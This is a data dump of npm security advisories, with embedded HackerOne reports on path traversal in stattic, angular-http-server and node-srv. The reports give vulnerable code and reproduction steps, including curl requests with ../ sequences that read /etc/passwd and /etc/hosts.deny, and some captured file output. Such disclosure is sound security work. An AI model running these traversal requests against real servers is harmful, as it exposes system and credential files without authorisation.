    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;local_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;pathname&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;//Check the extension&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;extname&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;local_path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="c1"&gt;//Add the index file to the local path&lt;/span&gt;
      &lt;span class="nx"&gt;local_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;local_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;./&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;basename&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If file provided has no extension, &lt;code&gt;/&lt;/code&gt; and &lt;code&gt;options.index&lt;/code&gt; are added (by default, it will become &lt;code&gt;/index.html&lt;/code&gt;). This causes that eg. &lt;code&gt;/etc/passwd&lt;/code&gt; path become &lt;code&gt;/etc/passwd/index.html&lt;/code&gt;, but &lt;code&gt;/etc/hosts.deny&lt;/code&gt; is valid filename and can be read:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://localhost:8080/../../../../../etc/hosts.deny
*   Trying ::1...
* Connected to localhost (::1) port 8080 (#0)
&amp;gt; GET /../../../../../etc/hosts.deny HTTP/1.1
&amp;gt; Host: localhost:8080
&amp;gt; User-Agent: curl/7.47.0
&amp;gt; Accept: */*
&amp;gt; 
&amp;lt; HTTP/1.1 200 OK
&amp;lt; Content-Type: null
&amp;lt; Date: Fri, 23 Feb 2018 12:36:35 GMT
&amp;lt; Connection: keep-alive
&amp;lt; Transfer-Encoding: chunked
&amp;lt; 
# /etc/hosts.deny: list of hosts that are _not_ allowed to access the system.
#                  See the manual pages hosts_access(5) and hosts_options(5).
#
# Example:    ALL: some.host.name, .some.domain
#             ALL EXCEPT in.fingerd: other.host.name, .other.domain
#
# If you&amp;#39;re going to protect the portmapper use the name &amp;quot;rpcbind&amp;quot; for the
# daemon name. See rpcbind(8) and rpc.mountd(8) for further information.
#
# The PARANOID wildcard matches any host whose name does not match its
# address.
#
# You may wish to enable this to ensure any programs that don&amp;#39;t
# validate looked up hostnames still leave understandable logs. In past
# versions of Debian this has been the default.
# ALL: PARANOID
* Connection #0 to host localhost left intact
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="patch"&gt;Patch&lt;/h2&gt;
&lt;p&gt;Probably some protection against typical Path Traversal exploitation methods should be introduced here.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Operating system: Ubuntu 16.04&lt;/li&gt;
&lt;li&gt;Node.js 8.9.4&lt;/li&gt;
&lt;li&gt;npm v. 5.6.0&lt;/li&gt;
&lt;li&gt;curl 7.47.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="wrap-up"&gt;Wrap up&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: [N] &lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: [N] &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Path Traversal vulnerability in &lt;code&gt;stattic module&lt;/code&gt; allows to go up in directory tree and read content of some files outside of the root path set up in the module config.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-23T12:44:58.526Z</t>
  </si>
  <si>
    <t>2018-03-06T22:04:34.271Z</t>
  </si>
  <si>
    <t>Path Traversal vulnerability in stattic module allows to go up in directory tree and read content of some files outside of the root path set up in the module config.</t>
  </si>
  <si>
    <t xml:space="preserve">report Path Traversal stattic module. allows read content arbitrary files server stattic installed run.  Module  module name  stattic version  0.2.3 npm page  https //www.npmjs.com/package/stattic  Module Description  Ridiculous simple script serving static files using http module.  Module Stats  Stats 7 downloads last day 32 downloads last week 77 downloads last month  ~900 estimated downloads per year  Vulnerability Description  Path Traversal vulnerability stattic module allows go directory tree read content files outside root path set module config.  However, issue allows read files extension, no extension provided, stattic default uses setting variable.  Steps Reproduce   Install stattic module  $ npm install stattic  Create sample application  // //Import libs var stattic = require("stattic");  //Set folder static files stattic.set("folder", "./");  //Set port stattic.set("port", 8080);  //Run server stattic.listen();  Run application  $ node  Here"s part stattic code responsible handling paths  // node_modules/stattic/index.js, line 70       //Parse request url pathname     var pathname = url.parse(req.url).pathname;      //Resolve local folder     var local_path = path.join(options.folder, pathname);      //Check extension     if(path.extname(local_path) === "")     {       //Add index file local path       local_path = path.join(local_path, "./" + path.basename(options.index));     }   file provided no extension, / added (by default, will become /index.html). causes eg. /etc/passwd path become /etc/passwd/index.html, /etc/hosts.deny valid filename read  $ curl  v   path http //localhost 8080/../../../../../etc/hosts.deny *   Trying   1... * Connected localhost (  1) port 8080 (#0)   /../../../../../etc/hosts.deny HTTP/1.1   Host  localhost 8080   User Agent  curl/7.47.0   Accept  */*    &lt; HTTP/1.1 200 OK &lt; Content Type  null &lt; Date  Fri, 23 Feb 2018 12 36 35 GMT &lt; Connection  keep alive &lt; Transfer Encoding  chunked &lt;  # /etc/hosts.deny  list hosts _not_ allowed access system. #                  manual pages hosts_access(5) hosts_options(5). # # Example      some.host.name, .some.domain #             EXCEPT  other.host.name, .other.domain # # you"re going protect portmapper use name Â« Â»rpcbindÂ« Â» # daemon name. rpcbind(8) rpc.mountd(8) further information. # # PARANOID wildcard matches host whose name does not match its # address. # # may wish enable ensure programs don"t # validate looked hostnames leave understandable logs. past # versions Debian default. #  PARANOID  * Connection #0 host localhost left intact  Patch  Probably protection against typical Path Traversal exploitation methods introduced here.  Supporting Material/References    Operating system  Ubuntu 16.04 8.9.4 npm v. 5.6.0 curl 7.47.0   Wrap   contacted maintainer let know  [N]  opened issue related repository  [N]    Regards,  Rafal "bl4de" Janicki  Impact  Path Traversal vulnerability stattic module allows go directory tree read content files outside root path set module config. </t>
  </si>
  <si>
    <t>Path Traversal vulnerability stattic module allows go directory tree read content files outside root path set module config.</t>
  </si>
  <si>
    <t>Path Traversal</t>
  </si>
  <si>
    <t>/advisories/590</t>
  </si>
  <si>
    <t>2018-04-24T22:46:07.854+00:00</t>
  </si>
  <si>
    <t>&lt;3.0.4</t>
  </si>
  <si>
    <t>&gt;=3.0.4</t>
  </si>
  <si>
    <t>[angular-http-server] Path Traversal in angular-http-server.js allows to read arbitrary file from the remote server</t>
  </si>
  <si>
    <t>/advisories/589</t>
  </si>
  <si>
    <t>2018-04-24T22:44:33.305+00:00</t>
  </si>
  <si>
    <t>&lt;1.4.3</t>
  </si>
  <si>
    <t>&gt;=1.4.3</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/309120.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;angular-http-server&lt;/strong&gt; (&lt;a title="https://www.npmjs.com/package/angular-http-server" href="/redirect?signature=3d9106217c5d63d0f835d75332f618b95d25453c&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fangular-http-server" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/angular-http-server&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;) contains Path Traversal vulnerability, which allows malicious user to read content of any file with known path.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;A very simple application server designed for Single Page App (SPA) developers.&lt;br&gt;
(&lt;a title="https://www.npmjs.com/package/angular-http-server" href="/redirect?signature=3d9106217c5d63d0f835d75332f618b95d25453c&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fangular-http-server" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/angular-http-server&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;angular-http-server does not sanitize path in the correct way, so &lt;code&gt;curl&lt;/code&gt; can be used to retrieve content of any file from the remote server.&lt;/p&gt;
&lt;p&gt;Vulnerable code in &lt;code&gt;angular-http-server.js&lt;/code&gt; file (lines 66-82):&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;possibleFilename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;fileBuffer&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;isFile&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;fileBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;readFileSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;possibleFilename&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;ct&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;mime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;lookup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;possibleFilename&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;`Sending &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;possibleFilename&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt; with Content-Type &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;ct&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;writeHead&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;ct&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Route %s, replacing with index.html&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;possibleFilename&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nx"&gt;fileBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;returnDistFile&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
            &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;writeHead&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;text/html&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;fileBuffer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;File with &lt;code&gt;possibleFilename&lt;/code&gt; name is read and send with guessed mime type. No path or allowed mime type validation is implemented - if it&amp;#39;s possible to read the file, code just does it.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;angular-http-server&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install angular-http-server
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;create static &lt;code&gt;index.html&lt;/code&gt; file (required as starting point of an app:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;charset=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;utf8&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;Index HTML&lt;span class="nt"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;div&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;p&amp;gt;&lt;/span&gt;This is index.html :)&lt;span class="nt"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run server in the same folder where &lt;code&gt;index.html&lt;/code&gt; was created:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ angular-http-server --path ./
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;open the browser and go to &lt;code&gt;127.0.0.1:8080&lt;/code&gt; You should see HTML output.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;from the terminal, execute folloiwng command (please adjust numbers of ../ to your system):&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://127.0.0.1:8080/../../../../../etc/passwd
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You should see the content of &lt;code&gt;/etc/passwd&lt;/code&gt; file:&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="1.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/351/ec2b7172584f64a4ebc3eea0ccb39684ee58c957/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJIYMMSDL3G47ZHZA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDPj0%2BNorsVr8b6QBSCK3A2BoQuLazI60UGdQANehOL7yM3f1GWriYZoNKrrU6TOlcXdVILDVEVSi3pH9CypXtHSdpT3ttLhNZCdiOZgkYtUfZX2l5Lsbb7W7oKRRceaDmV%2F5PlVVXfXrhQ8GVIJzaZ1UIo6GhUDiTlzcUJ1sbbZIG1eggdPKaU6Y%2FwXY5ygUQhIWGWd1VIQDKMrYD1VPnl5FHoamF56FqkbAHkwMhz2W%2F%2FTZjMd9go5cxcHY6YieSnzNu0Sv4gi%2FNg5%2BBLk6Tj7n83F2IIj7C3%2BOqDXAxQt41SZLNQuXU8gvRour4988J19mWfHGdbmMdmlGHqefCEjT7Slnmfg31IVo58e1GwJbblMQXRgsMKoHrLdPZfjQzq6Y7uY5aen1an5%2FtjtIfbEff7owYDuP4KB83BzNBBczNxdm1Gkwl02iS70%2FMhcg8K8WtDsjdfPBCxRk7wDCVjRM3fw3s%2BFfwg8KrvC2odo9oLslsi0FgIqtlvZs3mxw5bt7HyVa31SQlxnFOGyFbkyk7r1OiINX72%2FV3VOJaMxqSHtDhqNvaHj%2F2pHiUCs5M1kQMZULmuGiomZndCEPta7cptVj0rwo1L3s2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=557546341a57df8e535c8d174bb0d878d3a7893673f5c08bb3536a1cc86f5148" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/351/ec2b7172584f64a4ebc3eea0ccb39684ee58c957/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJIYMMSDL3G47ZHZA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDPj0%2BNorsVr8b6QBSCK3A2BoQuLazI60UGdQANehOL7yM3f1GWriYZoNKrrU6TOlcXdVILDVEVSi3pH9CypXtHSdpT3ttLhNZCdiOZgkYtUfZX2l5Lsbb7W7oKRRceaDmV%2F5PlVVXfXrhQ8GVIJzaZ1UIo6GhUDiTlzcUJ1sbbZIG1eggdPKaU6Y%2FwXY5ygUQhIWGWd1VIQDKMrYD1VPnl5FHoamF56FqkbAHkwMhz2W%2F%2FTZjMd9go5cxcHY6YieSnzNu0Sv4gi%2FNg5%2BBLk6Tj7n83F2IIj7C3%2BOqDXAxQt41SZLNQuXU8gvRour4988J19mWfHGdbmMdmlGHqefCEjT7Slnmfg31IVo58e1GwJbblMQXRgsMKoHrLdPZfjQzq6Y7uY5aen1an5%2FtjtIfbEff7owYDuP4KB83BzNBBczNxdm1Gkwl02iS70%2FMhcg8K8WtDsjdfPBCxRk7wDCVjRM3fw3s%2BFfwg8KrvC2odo9oLslsi0FgIqtlvZs3mxw5bt7HyVa31SQlxnFOGyFbkyk7r1OiINX72%2FV3VOJaMxqSHtDhqNvaHj%2F2pHiUCs5M1kQMZULmuGiomZndCEPta7cptVj0rwo1L3s2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=557546341a57df8e535c8d174bb0d878d3a7893673f5c08bb3536a1cc86f5148" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Also, in the &lt;code&gt;angular-http-server&lt;/code&gt; log there is information about mime type of the file (&lt;code&gt;application/octet-stream&lt;/code&gt;):&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/angular-http-server/angular-http-server.js --path ./
Path specified: ./
Using index.html
Listening on 8080
Sending ../../../../../etc/passwd with Content-Type application/octet-stream
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration I&amp;#39;ve used to find this vulnerability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS HighSierra 10.13.3&lt;/li&gt;
&lt;li&gt;node 8.9.3&lt;/li&gt;
&lt;li&gt;npm 5.5.1&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;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&lt;p&gt;This vulnerability allows malicious user to read content of any file on the machine where angular-http-server is running.&lt;/p&gt;
&lt;p&gt;This might expose vectors to attack system with Remote Code Execution, reveals files with usernames and passwords and many other possibilites.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-25T19:45:34.645Z</t>
  </si>
  <si>
    <t>2018-03-01T22:14:10.111Z</t>
  </si>
  <si>
    <t>This vulnerability allows malicious user to read content of any file on the machine where angular-http-server is running.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  angular http server (https //www.npmjs.com/package/angular http server) contains Path Traversal vulnerability, allows malicious user read content file known path.  Module    simple application server designed Single Page App (SPA) developers. (https //www.npmjs.com/package/angular http server)  Description  angular http server does not sanitize path correct way, so curl used retrieve content file remote server.  Vulnerable code angular http file (lines 66 82)  fs.stat(possibleFilename, function(err, stats) {         var fileBuffer;         ( err &amp;amp;&amp;amp; stats.isFile()) {             fileBuffer = fs.readFileSync(possibleFilename);             let ct = mime.lookup(possibleFilename);             console.log(`Sending ${possibleFilename} Content Type ${ct}`);             res.writeHead(200, { "Content Type"  ct });          } else {             console.log(Â« Â»Route %s, replacing index.htmlÂ« Â», possibleFilename);             fileBuffer = returnDistFile();             res.writeHead(200, { "Content Type"  "text/html" });         }          res.write(fileBuffer);         res.end();     });  File possibleFilename name read send guessed mime type. No path allowed mime type validation implemented   it"s possible read file, code just does it.  Steps Reproduce    install angular http server   $ npm install angular http server   create static file (required starting point app               Index HTML                  )           run server folder created   $ angular http server   path ./   open browser go 8080 HTML output. terminal, execute folloiwng command (please adjust numbers ../ system)   $ curl  v   path http //127.0.0.1 8080/../../../../../etc/passwd  content /etc/passwd file     Also, angular http server log information mime type file (application/octet stream)  $ ./node_modules/angular http server/angular http   path ./ Path specified  ./ Using Listening 8080 Sending ../../../../../etc/passwd Content Type application/octet stream   Supporting Material/References   Configuration I"ve used find vulnerability    macOS HighSierra 10.13.3 node 8.9.3 npm 5.5.1 curl 7.54.0   Wrap  hope report will help keep Node ecosystem safe. questions details finding, please let know comment.  Thank  Regards,  Rafal "bl4de" Janicki  Impact  vulnerability allows malicious user read content file machine angular http server running.  expose vectors attack system Remote Code Execution, reveals files usernames passwords possibilites. </t>
  </si>
  <si>
    <t>vulnerability allows malicious user read content file machine angular-http-server running.</t>
  </si>
  <si>
    <t>[node-srv] Path Traversal allows to read arbitrary files from remote server</t>
  </si>
  <si>
    <t>/advisories/588</t>
  </si>
  <si>
    <t>2018-04-24T22:43:00.063+00:00</t>
  </si>
  <si>
    <t>node-srv</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-srv</t>
  </si>
  <si>
    <t>&lt;2.1.1</t>
  </si>
  <si>
    <t>&gt;=2.1.1</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/309124.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;node-srv&lt;/strong&gt; contains Path Traversal vulnerability, which allows malicious user to read content of any file with known path.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Simple static node.js server. Supports Heroku and Grunt.js&lt;br&gt;
&lt;a title="https://www.npmjs.com/package/node-srv" href="/redirect?signature=03842cc7b806d4056739a62f8895a9536cd35ba3&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fnode-srv" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/node-srv&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;node-srv&lt;/code&gt; does not sanitize path in the correct way, so &lt;code&gt;curl&lt;/code&gt; can be used to retrieve content of any file from the remote server.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;node-srv&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install node-srv
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;create simple server:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;//Require module &lt;/span&gt;
&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;Server&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;node-srv&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;// Start server &lt;/span&gt;
&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;srv&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;Server&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;8080&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;root&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;./&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;logs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
